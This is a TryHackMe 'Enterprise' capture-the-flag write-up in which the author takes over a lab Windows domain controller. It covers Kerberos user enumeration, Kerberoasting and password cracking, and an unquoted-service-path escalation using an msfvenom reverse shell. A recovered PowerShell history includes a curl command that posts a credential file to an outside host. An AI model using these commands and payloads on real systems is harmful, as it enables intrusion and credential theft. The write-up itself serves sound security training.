TryHackMe: Enterprise
TryHackMe: Enterprise by Sq00ky
You just landed in an internal network. You scan the network and there's only the Domain Controller...
Enumeration
Let's add the box to /etc/hosts and run rustscan as per usual.
╰─⠠⠵ rustscan -a enterprise --ulimit 10000 -- -sC -sV -oA enterprise -vv -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.71.222:53
Open 10.10.71.222:80
Open 10.10.71.222:88
Open 10.10.71.222:135
Open 10.10.71.222:139
Open 10.10.71.222:389
Open 10.10.71.222:445
Open 10.10.71.222:464
Open 10.10.71.222:593
Open 10.10.71.222:3268
Open 10.10.71.222:3269
Open 10.10.71.222:3389
Open 10.10.71.222:5985
Open 10.10.71.222:9389
Open 10.10.71.222:7990
Open 10.10.71.222:47001
Open 10.10.71.222:49664
Open 10.10.71.222:49666
Open 10.10.71.222:49665
Open 10.10.71.222:49669
Open 10.10.71.222:49670
Open 10.10.71.222:49671
Open 10.10.71.222:49672
Open 10.10.71.222:49675
Open 10.10.71.222:49691
Open 10.10.71.222:49698
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-24 18:36 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:36
Completed NSE at 18:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:36
Completed NSE at 18:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:36
Completed NSE at 18:36, 0.00s elapsed
Initiating Ping Scan at 18:36
Scanning 10.10.71.222 [2 ports]
Completed Ping Scan at 18:36, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 18:36
Scanning enterprise (10.10.71.222) [26 ports]
Discovered open port 53/tcp on 10.10.71.222
Discovered open port 139/tcp on 10.10.71.222
Discovered open port 80/tcp on 10.10.71.222
Discovered open port 3389/tcp on 10.10.71.222
Discovered open port 135/tcp on 10.10.71.222
Discovered open port 464/tcp on 10.10.71.222
Discovered open port 445/tcp on 10.10.71.222
Discovered open port 7990/tcp on 10.10.71.222
Discovered open port 49675/tcp on 10.10.71.222
Discovered open port 49666/tcp on 10.10.71.222
Discovered open port 88/tcp on 10.10.71.222
Discovered open port 49672/tcp on 10.10.71.222
Discovered open port 49698/tcp on 10.10.71.222
Discovered open port 49691/tcp on 10.10.71.222
Discovered open port 9389/tcp on 10.10.71.222
Discovered open port 5985/tcp on 10.10.71.222
Discovered open port 49671/tcp on 10.10.71.222
Discovered open port 49670/tcp on 10.10.71.222
Discovered open port 593/tcp on 10.10.71.222
Discovered open port 49664/tcp on 10.10.71.222
Discovered open port 49665/tcp on 10.10.71.222
Discovered open port 3268/tcp on 10.10.71.222
Discovered open port 389/tcp on 10.10.71.222
Discovered open port 47001/tcp on 10.10.71.222
Discovered open port 49669/tcp on 10.10.71.222
Discovered open port 3269/tcp on 10.10.71.222
Completed Connect Scan at 18:36, 0.07s elapsed (26 total ports)
Initiating Service scan at 18:36
Scanning 26 services on enterprise (10.10.71.222)
Completed Service scan at 18:37, 60.16s elapsed (26 services on 1 host)
NSE: Script scanning 10.10.71.222.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:37
Completed NSE at 18:38, 8.66s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.80s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
Nmap scan report for enterprise (10.10.71.222)
Host is up, received syn-ack (0.035s latency).
Scanned at 2021-03-24 18:36:56 GMT for 69s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2021-03-24 18:37:03Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: LAB-ENTERPRISE
| NetBIOS_Domain_Name: LAB-ENTERPRISE
| NetBIOS_Computer_Name: LAB-DC
| DNS_Domain_Name: LAB.ENTERPRISE.THM
| DNS_Computer_Name: LAB-DC.LAB.ENTERPRISE.THM
| DNS_Tree_Name: ENTERPRISE.THM
| Product_Version: 10.0.17763
|_ System_Time: 2021-03-24T18:38:00+00:00
| ssl-cert: Subject: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Issuer: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-03-11T02:11:05
| Not valid after: 2021-09-10T02:11:05
| MD5: d8c9 5a65 d898 d33c f8bd cff4 49a2 c4ea
| SHA-1: 7881 f6c1 a795 41a4 f568 30b7 5e7d 6f08 6df9 3ce0
| -----BEGIN CERTIFICATE-----
| MIIC9jCCAd6gAwIBAgIQGZG+bRktjrFDvW4ldSwrgjANBgkqhkiG9w0BAQsFADAk
| MSIwIAYDVQQDExlMQUItREMuTEFCLkVOVEVSUFJJU0UuVEhNMB4XDTIxMDMxMTAy
| MTEwNVoXDTIxMDkxMDAyMTEwNVowJDEiMCAGA1UEAxMZTEFCLURDLkxBQi5FTlRF
| UlBSSVNFLlRITTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOrqv0Tw
| Zt+JgTN/CC0w8hD6hp+gv3R6zjDYl5JCGIlxIiS4+ddn6PXDHV3QexSWraNhsxML
| Ga1EGfoYTmWHkHXWu38/dgq/qhfYVqnrllyH0FlWZZuZbrGlBZIKySaYSwBlkkV7
| EYxbe5Dv9sVdAm3X6fgOcXRcy0rj7R7Z4mVNYX2Jxg5AGTTVAvZIG6NsB/7XXl7t
| IjH9x0KndeoGf0kFpC6Fs81leyvew5FaVNmQ3YfrQg6H8i1u3moyEL3RnMLAxUR2
| 6sU9FL7qx8iUaIzewIxRab0GDXcX3c3oJz2j02wKAO/DzsWLfiphN1Djo/dHXn3c
| VkfYHrfLeODb0JECAwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0P
| BAQDAgQwMA0GCSqGSIb3DQEBCwUAA4IBAQCw7HHNzixGocP+5AnFaS10P//DDUDQ
| GS7yK2jEmR+qm4C30hNO4o1FmpvGe6pwI80KwQ8Ssg4lJpFsZW7tU93kY2BHMTLn
| 2NjZ1vSbmoRkNaL2tBo06q39gMxgJpnur4KIZvqsr5g8DMUFHQZRIkxF5HxoBGca
| YoEMgzpOOE6SDlG1Le9FZmdHFy5DJwk8MXlu2K5Uec7fEHVQez3fD3vKvZi8iP8j
| b4ZOBsb+rPnPa5tWllP6+cAys3RwktRo/fgCfptLtUkU+rVtrphUgjS1aNsOD67D
| /trlJ/bGJQka5LSdqQbcZJrxHJBxjSdQ+A+2ntkctGj6qJdoocWtedEZ
|_-----END CERTIFICATE-----
|_ssl-date: 2021-03-24T18:38:06+00:00; +1s from scanner time.
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7990/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Log in to continue - Log in with Atlassian account
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49671/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49672/tcp open msrpc syn-ack Microsoft Windows RPC
49675/tcp open msrpc syn-ack Microsoft Windows RPC
49691/tcp open msrpc syn-ack Microsoft Windows RPC
49698/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 33562/tcp): CLEAN (Couldn't connect)
| Check 2 (port 41303/tcp): CLEAN (Couldn't connect)
| Check 3 (port 54840/udp): CLEAN (Timeout)
| Check 4 (port 11446/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-03-24T18:37:58
|_ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.35 seconds
Ok, so we have a domain controller, LAB-DC.LAB.ENTERPRISE.THM, for the LAB.ENTERPRISE.THM domain; the rdp-ntlm-info DNS_Tree_Name shows this is a child domain in the ENTERPRISE.THM forest. Two things worth noting from the host scripts: SMB signing is enabled and required, so NTLM relay to this box is off the table, and clock skew is 0s, which matters for the Kerberos work later.
80/http
Port 80 open on a domain controller is not the norm, so let's take a look:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h1> Enterprise Domain Controller. Keep out! </h1>
</html>
Whilst I leave nikto and gobuster running against it, let's move on.
445/smb
Let's run smbclient with no credentials (just press Enter at the password prompt) and see what we get:
╰─⠠⠵ smbclient -L \\lab-dc
Enter WORKGROUP\tj's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Docs Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk Users Share. Do Not Touch!
SMB1 disabled -- no workgroup available
Ok, so let's take a look at Users
╰─⠠⠵ smbclient //lab-dc/Users
Enter WORKGROUP\tj's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Fri Mar 12 02:11:49 2021
.. DR 0 Fri Mar 12 02:11:49 2021
Administrator D 0 Thu Mar 11 21:55:48 2021
All Users DHSrn 0 Sat Sep 15 08:28:48 2018
atl[REDACTED] D 0 Thu Mar 11 22:53:06 2021
[REDACTED] D 0 Fri Mar 12 02:11:51 2021
Default DHR 0 Fri Mar 12 00:18:03 2021
Default User DHSrn 0 Sat Sep 15 08:28:48 2018
desktop.ini AHS 174 Sat Sep 15 08:16:48 2018
LAB-ADMIN D 0 Fri Mar 12 00:28:14 2021
Public DR 0 Thu Mar 11 21:27:02 2021
15587583 blocks of size 4096. 9718449 blocks available
Under LAB-ADMIN we have LAB-ADMIN\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D, which may hold saved credentials; files in that folder are DPAPI blobs, though, so without the user's master key (or their password) they cannot be decrypted offline. More immediately useful is a PowerShell history file at AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt:
cd C:\
mkdir monkey
cd monkey
cd ..
cd ..
cd ..
cd D:
cd D:
cd D:
D:\
mkdir temp
cd temp
echo "replication:101RepAdmin123!!">private.txt
Invoke-WebRequest -Uri http://1.215.10.99/payment-details.txt
more payment-details.txt
curl -X POST -H 'Cotent-Type: ascii/text' -d .\private.txt' http://1.215.10.99/dropper.php?file=itsdone.txt
del private.txt
del payment-details.txt
cd ..
del temp
cd C:\
C:\
exit
Here we see something that could be a username and password, replication:101RepAdmin123!!, but I could not find anywhere for it to work.
7990/tcp
This is another IIS site. 7990 is the default port for Atlassian Bitbucket Server, which matches the login page title:
7990/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Log in to continue - Log in with Atlassian account
The login form does not seem to work, but the page carries a note: "Reminder to all Enterprise-THM Employees: We are moving to Github! ..." Searching GitHub we find a user and a repo, but nothing really obvious in it at first glance.
What is the contents of User.txt
After scanning round the box for a while I could not find anything useful, so I decided to try some brute forcing. Kerberos user enumeration with kerbrute is a good fit here: the KDC on port 88 answers an AS-REQ for a non-existent principal with KDC_ERR_C_PRINCIPAL_UNKNOWN but asks a real account for pre-authentication (KDC_ERR_PREAUTH_REQUIRED), and because no password is sent these requests do not count towards account lockout.
cd /opt
git clone https://github.com/ropnop/kerbrute.git
cd kerbrute
go build
./kerbrute userenum /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -d lab.enterprise.thm --dc "lab-dc"
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 03/24/21 - Ronnie Flathers @ropnop
2021/03/24 19:35:18 > Using KDC(s):
2021/03/24 19:35:18 > lab-dc:88
2021/03/24 19:35:20 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:35:21 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:35:26 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:35:42 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:35:52 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:36:01 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:36:11 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:36:11 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:37:01 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:37:03 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:37:29 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:38:55 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:38:56 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:38:58 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:42:42 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
Throwing those through hydra was taking an age, so I went back to browsing the ENTERPRISE-THM GitHub repo. The only person listed was Nik-enterpise-dev. Looking at the commit history we see the message "I accidentally added something", and the first version of the file includes a password. Using these creds we can mount the Docs share found above:
╰─⠠⠵ sudo mount -t cifs //lab-dc/Docs mount -o username=nik,password=[REDACTED],workgroup=lab
╰─⠠⠵ ls mount
RSA-Secured-Credentials.xlsx RSA-Secured-Document-PII.docx
Unfortunately these are password protected. Using office2john we can extract the hashes to feed into john:
╰─⠠⠵ /usr/share/john/office2john.py RSA-Secured-Document-PII.docx > office
╰─⠠⠵ /usr/share/john/office2john.py RSA-Secured-Credentials.xlsx >> office
╰─⠠⠵ john office --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Cracking these with john (or hashcat) was going to take some time, so I left that running and moved on to looking for SPNs, now that we have a valid domain username and password. Any authenticated domain user can request a service ticket for any SPN, and with RC4 (etype 23) that ticket is encrypted under the service account's NT hash, so it can be attacked offline (Kerberoasting):
╰─⠠⠵ python3 GetUserSPNs.py lab.enterprise.thm/nik:[REDACTED] -request
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- --------- ----------------------------------------------------------- -------------------------- -------------------------- ----------
HTTP/LAB-DC [REDACTED] CN=sensitive-account,CN=Builtin,DC=LAB,DC=ENTERPRISE,DC=THM 2021-03-12 01:20:01.333272 2021-03-15 04:07:33.747394
$krb5tgs$23$*[REDACTED]$LAB.ENTERPRISE.THM$lab.enterprise.thm/[REDACTED]*$f3b6650f71b8309a95cfe15877ba59ca$e81290b874a717993df3e1bb397a37c1d748c37011249c95dd6898c87faac100fe1e4e4533d90f7bdc7d7fdbf4083ad45526bd0fc1b06bad7ddddcbb37624c23e5417f58e4c20efdff3bd99f42b63a9b0e96205e36e2edda3cd225591bd84965c1fc83c2f56a44ce5f5e2cfbb4e30c74bc91fc70e8699b37b1af7715012f1ade73a4018e82c860f32f6ec64a52a2498a7cc03a788a7f141a243def93f5aab065b79e915e18ce00121170b3427d47e59b5789576f5851ced3b111343be8450fadff36757f0760ccc27f61ddfb63d01ff983d726997273aab9d8b9ff0eec3033372d13d55a01d292478b97f14935bb4e5fb5510b3c7897af9abf27db5b3876a844b585038061e5bcfa4592b2ae4c0b1bfbfce4febd8afe78f8cea88bb94638a286f4d3d6e0fb43271f0b5e3fecff93c727[REDACTED]b180573fe454711206a75d748ead49822fe3f4b7c0eb145344703d4a0e9037bfda4d13a2126af2a8541785dc9068881a78a3098a587d19955f03974c2794873ae8a8710c9e0051d909965498f5bb24a7505f02d5374cfa2236ba2441858bda0fd9e8064f372482e8856d3f4a495a9ac0fdc92cdb0d9b114eb3130e64278ec6325ab30d4a852d8b872936882cb59497f34edd8669ad32cdada591fd319b86efc79f70f1d702db3bc73d297f38828ff007828eabb0827f2e6e16d6fcbe3cbfa8f012470326bd39637bf89445351dc1acd57fb32ed024d6c5d325a486039ea4b985964a5d47b05af7498203adde9faf5e6e1a21827a04846b795a6f6ee78c54bd59366bcc1e81a345377c8778d37946b9b70176a32fcf5c358bf245194a7ee292b382f1719daa663c56966dece93b8ef814fbeb2d14d04d8b30acd4e56c9df60e96697a261a11b7bfe60420a[REDACTED]20f20e3397a7338465daeb463528184c5a6886af5e51388d645328b075328a69937c0374026ceaa12483b3bf9576cd20a10ae7a12ea3ec015d68e03dcba059f785da1f61c11fad90b1c5cc08ca62052dc904ccd56188f8e4577cab28a30157383b429ccebff485fc2ed5b5f29e46a43da5a098d6d82654b181b1366146702e9a5c3d0ca433e67ed558f3f74017ce756aad97b907bc598b4ce84a58f69a97c5b67002de7fbb879b7405e0679c1761084f5d244f104558989408a66506d6c898f31a886d5fc16a5f8a695d420aa07703c95c90b141739fa33bd06e6f3accb2a643702755b4aae40e7aca06ba01cc05
Saving the ticket hash to a file and throwing it at john, the password cracks almost instantly:
╰─⠠⠵ john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt tgt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (?)
1g 0:00:00:00 DONE (2021-03-24 20:47) 1.010g/s 1586Kp/s 1586Kc/s 1586KC/s livelife93..liss27
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Using this username and password we can mount the Users share again and read the flag from that account's desktop:
╰─⠠⠵ sudo mount -t cifs //lab-dc/Users mount -o username=[REDACTED],password=[REDACTED],workgroup=lab
╰─⠠⠵ cd mount/[REDACTED]/
╰─○ cat Desktop/user.txt
THM{[REDACTED]}
What is the contents of Root.txt
Now that we have the first flag we can start looking for privilege escalation. rdesktop gave me issues, so I ended up using xfreerdp to get a remote desktop:
╰─⠠⠵ xfreerdp /u:[REDACTED] /p:[REDACTED] /v:lab-dc
Copying over winPEAS.bat and running it, we look for anything interesting:
[+] UNQUOTED SERVICE PATHS
[i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
[i] The permissions are also checked and filtered using icacls
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
ADWS
zerotieroneservice
C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe
Invalid parameter "Files"
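Before weaponising this, it helps to see exactly which file names Windows probes for that ImagePath. The following is an added example, not the write-up's code or winPEAS's; it takes the ZeroTier path and service name from the output above (the other inputs are constructed), lists the candidate executables in the order CreateProcess tries them, and produces the quoted path that fixes the service.

```python
"""Unquoted service path analysis.

Added example; not from the original write-up or from winPEAS. Given a
service's binary path as shown by winPEAS or `sc qc`, list the file names
CreateProcess will probe before reaching the real executable, and produce
the quoted form that closes the hole. The ZeroTier path and service name
are from the write-up; the other inputs are constructed.
"""
import ntpath


def _split_program(image_path: str):
    """Best-effort split of an ImagePath into (program, arguments).

    Windows itself cannot tell where the program ends when the path is
    unquoted, which is the root cause; we stop at the first '.exe' as a heuristic."""
    path = image_path.strip()
    end = path.lower().find(".exe")
    return (path[:end + 4], path[end + 4:]) if end != -1 else (path, "")


def hijack_candidates(image_path: str) -> list:
    """Executables Windows will try, in order, before the intended one.

    For an unquoted path with spaces, CreateProcess treats the text up to each
    space as a possible program and appends .exe when there is no extension.
    A quoted path, or one with no spaces, yields nothing."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    program, _ = _split_program(path)
    parts = program.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def quote_image_path(image_path: str) -> str:
    """The fix: quote the program so the whole path is one token."""
    path = image_path.strip()
    if path.startswith('"'):
        return path
    program, args = _split_program(path)
    return f'"{program}"{args}'


def sc_config_fix(service: str, image_path: str) -> str:
    """Command an administrator runs on the host to apply the quoted path.
    Inner quotes are escaped for cmd.exe; note the required space after 'binPath='."""
    quoted = quote_image_path(image_path).replace('"', '\\"')
    return f'sc config {service} binPath= "{quoted}"'


if __name__ == "__main__":
    zerotier = r"C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe"
    for path in (zerotier, quote_image_path(zerotier), r"C:\Windows\System32\svchost.exe -k netsvcs"):
        print(path)
        for candidate in hijack_candidates(path):
            print("   probes:", candidate)
    print(sc_config_fix("zerotieroneservice", zerotier))
```

A candidate only matters if the current user can write to its directory (check with `icacls "C:\Program Files (x86)\Zero Tier"` on the box) and can start or restart the service, which here runs as LocalSystem; that combination, rather than the missing quotes alone, is the privilege escalation.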
This is an unquoted service path: because the path contains spaces and no quotes, the service control manager will try C:\Program.exe, then C:\Program Files.exe, then C:\Program Files (x86)\Zero.exe, then C:\Program Files (x86)\Zero Tier\Zero.exe and so on before it reaches the real binary. Since our user can write into C:\Program Files (x86)\Zero Tier\ and can start the service, we can run our own executable as the service account. First let's generate the exe with msfvenom:
╰─⠠⠵ msfvenom -p windows/x64/shell/reverse_tcp -f exe LHOST={IP-ADDRES} LPORT=4444 -o shell4444.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell4444.exe
Then we copy it to the box as C:\Program Files (x86)\Zero Tier\Zero.exe, one of the paths Windows probes before the real binary, inside a directory we can write to. Start-Service zerotieroneservice then starts the service, which launches our exe and connects back to the waiting handler:
msf6 exploit(multi/handler) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > rerun
[*] Reloading module...
[*] Started reverse TCP handler on 10.9.0.xx:4444
[*] Sending stage (336 bytes) to 10.10.71.222
[*] Command shell session 1 opened (10.9.0.xx:4444 -> 10.10.71.222:52763) at 2021-03-24 21:43:28 +0000
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
THM{[REDACTED]}
Done!
What a PIA that room was; it took far too long, but I guess I am out of practice with Windows rooms.